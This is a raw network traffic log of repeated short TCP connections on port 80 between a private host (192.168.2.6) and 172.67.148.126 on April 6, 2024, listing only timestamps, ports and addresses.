Apr 6, 2024 09:30:18.674487114 CEST	49790	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:18.799026012 CEST	80	49790	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:18.799104929 CEST	49790	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:18.923623085 CEST	80	49790	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:19.169862032 CEST	80	49790	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:19.170084000 CEST	80	49790	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:19.173440933 CEST	49790	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:19.173511028 CEST	49790	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:19.298187017 CEST	80	49790	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:19.313442945 CEST	49791	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:19.437589884 CEST	80	49791	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:19.437793970 CEST	49791	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:19.440133095 CEST	49791	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:19.564248085 CEST	80	49791	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:19.564436913 CEST	49791	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:19.688672066 CEST	80	49791	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:19.939126968 CEST	80	49791	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:19.939382076 CEST	49791	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:19.940578938 CEST	80	49791	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:19.940623999 CEST	49791	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:20.063569069 CEST	80	49791	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:20.079396009 CEST	49792	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:20.204114914 CEST	80	49792	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:20.204205990 CEST	49792	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:20.206304073 CEST	49792	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:20.330754042 CEST	80	49792	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:20.330866098 CEST	49792	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:20.455497026 CEST	80	49792	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:20.703933001 CEST	80	49792	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:20.704082012 CEST	49792	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:20.704967976 CEST	80	49792	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:20.705049038 CEST	49792	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:20.828557968 CEST	80	49792	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:20.844234943 CEST	49793	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:20.968045950 CEST	80	49793	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:20.968179941 CEST	49793	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:20.970309973 CEST	49793	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:21.094041109 CEST	80	49793	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:21.094136953 CEST	49793	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:21.217803955 CEST	80	49793	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:21.460465908 CEST	80	49793	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:21.460719109 CEST	80	49793	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:21.460761070 CEST	49793	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:21.460798979 CEST	49793	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:21.584651947 CEST	80	49793	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:21.609075069 CEST	49794	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:21.733210087 CEST	80	49794	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:21.733340979 CEST	49794	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:21.735500097 CEST	49794	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:21.859648943 CEST	80	49794	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:21.859711885 CEST	49794	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:21.983899117 CEST	80	49794	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:22.237138033 CEST	80	49794	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:22.237330914 CEST	49794	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:22.237360954 CEST	80	49794	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:22.237413883 CEST	49794	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:22.361572981 CEST	80	49794	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:22.378374100 CEST	49795	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:22.501840115 CEST	80	49795	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:22.501966953 CEST	49795	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:22.504190922 CEST	49795	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:22.627835989 CEST	80	49795	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:22.627902985 CEST	49795	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:22.751507044 CEST	80	49795	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:23.013819933 CEST	80	49795	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:23.013947964 CEST	49795	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:23.013999939 CEST	80	49795	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:23.014039040 CEST	49795	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:23.137361050 CEST	80	49795	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:23.174083948 CEST	49796	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:23.298655987 CEST	80	49796	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:23.298796892 CEST	49796	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:23.301208019 CEST	49796	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:23.425890923 CEST	80	49796	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:23.425993919 CEST	49796	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:23.550468922 CEST	80	49796	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:23.815175056 CEST	80	49796	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:23.815342903 CEST	49796	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:23.815705061 CEST	80	49796	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:23.815753937 CEST	49796	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:23.939918041 CEST	80	49796	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:23.954077005 CEST	49797	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:24.079646111 CEST	80	49797	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:24.079809904 CEST	49797	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:24.081981897 CEST	49797	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:24.206351042 CEST	80	49797	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:24.206535101 CEST	49797	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:24.332076073 CEST	80	49797	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:24.592781067 CEST	80	49797	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:24.592894077 CEST	49797	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:24.593024015 CEST	80	49797	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:24.593069077 CEST	49797	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:24.717271090 CEST	80	49797	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:24.736130953 CEST	49798	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:24.860332012 CEST	80	49798	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:24.860423088 CEST	49798	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:24.862545967 CEST	49798	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:24.986644030 CEST	80	49798	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:24.986743927 CEST	49798	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:25.110795975 CEST	80	49798	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:25.372438908 CEST	80	49798	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:25.372597933 CEST	80	49798	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:25.372698069 CEST	49798	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:25.372776985 CEST	49798	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:25.496980906 CEST	80	49798	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:25.515328884 CEST	49799	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:25.638861895 CEST	80	49799	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:25.639014959 CEST	49799	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:25.641171932 CEST	49799	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:25.764619112 CEST	80	49799	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:25.764785051 CEST	49799	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:25.888334990 CEST	80	49799	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:26.148691893 CEST	80	49799	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:26.148840904 CEST	49799	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:26.149518967 CEST	80	49799	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:26.149573088 CEST	49799	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:26.272325993 CEST	80	49799	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:26.298290968 CEST	49800	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:26.422525883 CEST	80	49800	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:26.422630072 CEST	49800	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:26.424765110 CEST	49800	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:26.548904896 CEST	80	49800	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:26.549029112 CEST	49800	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:26.673949003 CEST	80	49800	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:26.935693026 CEST	80	49800	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:26.935798883 CEST	80	49800	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:26.935801029 CEST	49800	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:26.935842037 CEST	49800	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:27.059951067 CEST	80	49800	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:27.077133894 CEST	49801	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:27.201174974 CEST	80	49801	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:27.201373100 CEST	49801	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:27.203747034 CEST	49801	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:27.327698946 CEST	80	49801	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:27.327763081 CEST	49801	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:27.451694012 CEST	80	49801	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:27.716696978 CEST	80	49801	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:27.717015982 CEST	80	49801	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:27.717087030 CEST	49801	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:27.717123032 CEST	49801	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:27.841027975 CEST	80	49801	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:27.859169006 CEST	49802	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:27.983885050 CEST	80	49802	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:27.983969927 CEST	49802	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:27.986411095 CEST	49802	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:28.110852003 CEST	80	49802	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:28.110934019 CEST	49802	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:28.235358953 CEST	80	49802	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:28.497347116 CEST	80	49802	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:28.497505903 CEST	49802	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:28.498051882 CEST	80	49802	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:28.498101950 CEST	49802	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:28.622170925 CEST	80	49802	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:28.653531075 CEST	49803	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:28.777417898 CEST	80	49803	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:28.777538061 CEST	49803	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:28.779877901 CEST	49803	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:28.903537035 CEST	80	49803	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:28.903769016 CEST	49803	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:29.027790070 CEST	80	49803	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:29.282464981 CEST	80	49803	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:29.282593012 CEST	49803	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:29.283452034 CEST	80	49803	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:29.283540010 CEST	49803	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:29.407655954 CEST	80	49803	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:29.421494961 CEST	49804	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:29.545325994 CEST	80	49804	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:29.545447111 CEST	49804	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:29.547585964 CEST	49804	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:29.671443939 CEST	80	49804	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:29.671602964 CEST	49804	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:29.795556068 CEST	80	49804	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:30.060945988 CEST	80	49804	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:30.060966015 CEST	80	49804	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:30.061105013 CEST	49804	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:30.061194897 CEST	49804	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:30.185188055 CEST	80	49804	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:30.210575104 CEST	49805	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:30.334973097 CEST	80	49805	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:30.335150003 CEST	49805	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:30.339046955 CEST	49805	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:30.463177919 CEST	80	49805	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:30.463284969 CEST	49805	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:30.587558985 CEST	80	49805	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:30.831743002 CEST	80	49805	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:30.831943989 CEST	49805	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:30.832175970 CEST	80	49805	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:30.832232952 CEST	49805	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:30.956358910 CEST	80	49805	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:31.006457090 CEST	49806	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:31.130639076 CEST	80	49806	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:31.130732059 CEST	49806	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:31.133120060 CEST	49806	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:31.257896900 CEST	80	49806	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:31.258110046 CEST	49806	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:31.382184029 CEST	80	49806	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:31.641822100 CEST	80	49806	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:31.641983032 CEST	80	49806	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:31.642075062 CEST	49806	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:31.642075062 CEST	49806	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:31.766437054 CEST	80	49806	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:31.779946089 CEST	49807	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:31.904097080 CEST	80	49807	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:31.904386044 CEST	49807	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:31.907018900 CEST	49807	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:32.031569004 CEST	80	49807	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:32.031678915 CEST	49807	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:32.156002998 CEST	80	49807	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:32.410543919 CEST	80	49807	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:32.410608053 CEST	80	49807	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:32.410698891 CEST	49807	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:32.415286064 CEST	49807	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:32.539597034 CEST	80	49807	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:32.545986891 CEST	49808	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:32.670665026 CEST	80	49808	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:32.670768976 CEST	49808	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:32.673177958 CEST	49808	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:32.797804117 CEST	80	49808	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:32.797943115 CEST	49808	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:32.922580004 CEST	80	49808	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:33.166218042 CEST	80	49808	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:33.166414022 CEST	80	49808	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:33.173615932 CEST	49808	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:33.174376011 CEST	49808	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:33.299592972 CEST	80	49808	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:33.311635971 CEST	49809	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:33.435442924 CEST	80	49809	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:33.435586929 CEST	49809	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:33.437851906 CEST	49809	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:33.561779976 CEST	80	49809	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:33.561880112 CEST	49809	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:33.685776949 CEST	80	49809	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:33.930989027 CEST	80	49809	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:33.931010962 CEST	80	49809	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:33.931191921 CEST	49809	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:33.931296110 CEST	49809	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:34.055574894 CEST	80	49809	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:34.077178955 CEST	49810	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:34.201453924 CEST	80	49810	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:34.201560020 CEST	49810	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:34.204191923 CEST	49810	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:34.328246117 CEST	80	49810	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:34.328361988 CEST	49810	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:34.452722073 CEST	80	49810	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:34.696522951 CEST	80	49810	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:34.696715117 CEST	49810	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:34.696742058 CEST	80	49810	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:34.696814060 CEST	49810	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:34.821746111 CEST	80	49810	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:34.849395037 CEST	49811	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:34.973257065 CEST	80	49811	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:34.973357916 CEST	49811	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:34.975531101 CEST	49811	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:35.099325895 CEST	80	49811	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:35.099447966 CEST	49811	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:35.223535061 CEST	80	49811	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:35.472255945 CEST	80	49811	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:35.472476006 CEST	49811	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:35.473007917 CEST	80	49811	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:35.473076105 CEST	49811	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:35.596579075 CEST	80	49811	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:35.606564045 CEST	49812	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:35.730777025 CEST	80	49812	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:35.730906963 CEST	49812	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:35.733011007 CEST	49812	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:35.856702089 CEST	80	49812	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:35.856803894 CEST	49812	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:35.980560064 CEST	80	49812	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:36.246402025 CEST	80	49812	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:36.246582031 CEST	49812	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:36.246711969 CEST	80	49812	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:36.246759892 CEST	49812	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:36.370281935 CEST	80	49812	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:36.390377998 CEST	49814	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:36.514257908 CEST	80	49814	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:36.514352083 CEST	49814	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:36.516498089 CEST	49814	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:36.640285015 CEST	80	49814	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:36.640357971 CEST	49814	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:36.764275074 CEST	80	49814	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:37.034734964 CEST	80	49814	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:37.034841061 CEST	49814	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:37.035075903 CEST	80	49814	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:37.035121918 CEST	49814	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:37.158718109 CEST	80	49814	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:37.177728891 CEST	49815	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:37.302972078 CEST	80	49815	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:37.303078890 CEST	49815	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:37.305241108 CEST	49815	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:37.429336071 CEST	80	49815	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:37.429423094 CEST	49815	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:37.553621054 CEST	80	49815	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:37.815327883 CEST	80	49815	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:37.815438986 CEST	49815	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:37.815612078 CEST	80	49815	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:37.815660954 CEST	49815	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:37.939649105 CEST	80	49815	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:37.960941076 CEST	49816	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:38.085809946 CEST	80	49816	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:38.085903883 CEST	49816	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:38.088059902 CEST	49816	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:38.211796999 CEST	80	49816	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:38.212032080 CEST	49816	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:38.336040974 CEST	80	49816	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:38.584656000 CEST	80	49816	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:38.584834099 CEST	80	49816	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:38.584839106 CEST	49816	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:38.584878922 CEST	49816	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:38.708559990 CEST	80	49816	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:38.735029936 CEST	49818	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:38.859205008 CEST	80	49818	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:38.859316111 CEST	49818	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:38.861510038 CEST	49818	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:38.985665083 CEST	80	49818	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:38.985732079 CEST	49818	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:39.110068083 CEST	80	49818	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:39.373178959 CEST	80	49818	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:39.373356104 CEST	80	49818	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:39.373424053 CEST	49818	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:39.424190044 CEST	49818	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:39.548429966 CEST	80	49818	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:39.560051918 CEST	49819	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:39.684613943 CEST	80	49819	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:39.684708118 CEST	49819	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:39.686953068 CEST	49819	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:39.810956955 CEST	80	49819	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:39.811068058 CEST	49819	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:39.935753107 CEST	80	49819	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:40.186532974 CEST	80	49819	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:40.187047005 CEST	80	49819	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:40.187160969 CEST	49819	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:40.187199116 CEST	49819	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:40.311455965 CEST	80	49819	172.67.148.126	192.168.2.6
